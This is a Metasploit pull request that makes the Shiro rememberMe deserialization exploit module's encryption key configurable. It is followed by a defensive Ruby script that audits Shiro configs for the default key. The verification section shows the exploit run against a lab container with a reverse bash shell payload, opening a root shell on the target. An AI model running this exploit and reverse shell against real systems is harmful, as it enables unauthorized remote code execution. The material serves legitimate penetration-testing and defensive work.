replace hard-coded shiro default key with ENC_KEY #14522

Merged: 3 commits, Dec 22, 2020
Conversation

axxop (Contributor) commented Dec 16, 2020

In some cases, we need non-default keys.

Verification

Start shiro:
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

List the steps needed to make sure this thing works

  • Start msfconsole
  • use multi/http/shiro_rememberme_v124_deserialize
  • set LHOST 10.0.0.156
  • run

output:

msf6 exploit(multi/http/shiro_rememberme_v124_deserialize) > options 

Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):

   Name       Current Setting           Required  Description
   ----       ---------------           --------  -----------
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.0.156                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                        yes       The target port (TCP)
   SHIROKEY   kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro default key
   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                         yes       Base directory path
   VHOST                                no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.111.111.7     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command payload


msf6 exploit(multi/http/shiro_rememberme_v124_deserialize) > run

[*] Started reverse TCP handler on 10.111.111.7:4444 
[*] Command shell session 9 opened (10.111.111.7:4444 -> 10.111.111.5:41572) at 2020-12-16 11:11:33 +0800

whoami
root

bcoles (Contributor) commented Dec 16, 2020

Seems reasonable to me. A minor comment on the option description phrasing.

Please also update the module documentation to mention this new option.

  • documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md

It may also be nice to update the module description to mention something about the key, as technically this is exploitable on every version of Shiro if the key is known.

@gwillcox-r7 gwillcox-r7 self-assigned this Dec 21, 2020
bwatters-r7 (Contributor) left a review comment

This all looks good to me.

gwillcox-r7 (Contributor) commented
Thanks @bwatters-r7 will land this now.

@gwillcox-r7 gwillcox-r7 merged commit 4a449f9 into rapid7:master Dec 22, 2020
@gwillcox-r7 gwillcox-r7 changed the title from "replace hard-coded shiro default key with SHIROKEY" to "replace hard-coded shiro default key with ENC_KEY" Dec 22, 2020

gwillcox-r7 (Contributor) commented Dec 22, 2020

Release Notes

Replaced the hardcoded default Shiro encryption key within the shiro_rememberme_v124_deserialize module with a new datastore option named ENC_KEY which allows users to specify the key used to encrypt the rememberMe cookie. This in turn allows the module to target more recent versions provided the user knows the right encryption key value.

@gwillcox-r7 gwillcox-r7 added the rn-enhancement release notes enhancement label Dec 22, 2020
@axxop axxop deleted the lib-msf-core-exploits-shiro branch December 22, 2020 15:37
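The module output in the verification section shows the well-known Shiro default key, and bcoles's comment notes that any Shiro version is exploitable once the rememberMe key is known. From the defender's side, both reduce to one configuration check: is a deployment still running with the default cipherKey, or with a key that is not even a valid AES key? The following is an added Ruby example, not code from this PR or from Metasploit, that audits a base64 key value and scans a shiro.ini-style config for `cipherKey = <base64>` lines. The config line format and the sample config are assumptions constructed for the example; the default key value itself is the one shown in the module output above.

```ruby
require 'base64'
require 'securerandom'

# Well-known Shiro default rememberMe AES key (the value the module
# previously hard-coded; shown as SHIROKEY in the verification output).
SHIRO_DEFAULT_KEY = 'kPH+bIxk5D2deZiIxcaaaA=='
SHIRO_DEFAULT_KEY_BYTES = Base64.strict_decode64(SHIRO_DEFAULT_KEY).freeze

# AES key sizes in bytes (AES-128/192/256).
VALID_AES_KEY_BYTES = [16, 24, 32].freeze

# Audit a single configured key (base64 string). Returns:
#   :default - the well-known default key is still in use
#   :invalid - not strict base64, or not a valid AES key length
#   :ok      - a custom key of a valid AES length
def audit_shiro_key(b64_key)
  raw = begin
    Base64.strict_decode64(b64_key.to_s.strip)
  rescue ArgumentError
    return :invalid
  end
  return :default if raw == SHIRO_DEFAULT_KEY_BYTES
  return :invalid unless VALID_AES_KEY_BYTES.include?(raw.bytesize)
  :ok
end

# Scan shiro.ini-style text for cipherKey assignments (assumed line format:
# "<bean path>.cipherKey = <base64>"). Skips comment lines starting with
# '#' or ';'. Returns [[line_number, key_value, audit_result], ...].
def audit_shiro_ini(text)
  findings = []
  text.each_line.with_index(1) do |line, lineno|
    stripped = line.strip
    next if stripped.start_with?('#', ';')
    m = stripped.match(/cipherKey\s*=\s*(\S+)/)
    next unless m
    findings << [lineno, m[1], audit_shiro_key(m[1])]
  end
  findings
end

# Produce a fresh random AES-128 key in the base64 form Shiro config expects,
# for replacing a default or invalid key.
def generate_shiro_key(bytes = 16)
  Base64.strict_encode64(SecureRandom.random_bytes(bytes))
end

# Constructed sample config: this deployment still uses the default key.
SAMPLE_SHIRO_INI = <<~INI
  [main]
  # constructed sample shiro.ini fragment
  securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA==
INI

if $PROGRAM_NAME == __FILE__
  audit_shiro_ini(SAMPLE_SHIRO_INI).each do |lineno, key, result|
    puts "line #{lineno}: cipherKey=#{key} -> #{result}"
    puts "  suggested replacement: #{generate_shiro_key}" if result != :ok
  end
end
```

A `:default` finding means every rememberMe cookie the application accepts can be forged by anyone who knows the public default, regardless of the Shiro version; a `:invalid` finding usually means the key was mis-pasted and the application is silently falling back or failing at startup, which is worth verifying in the application logs.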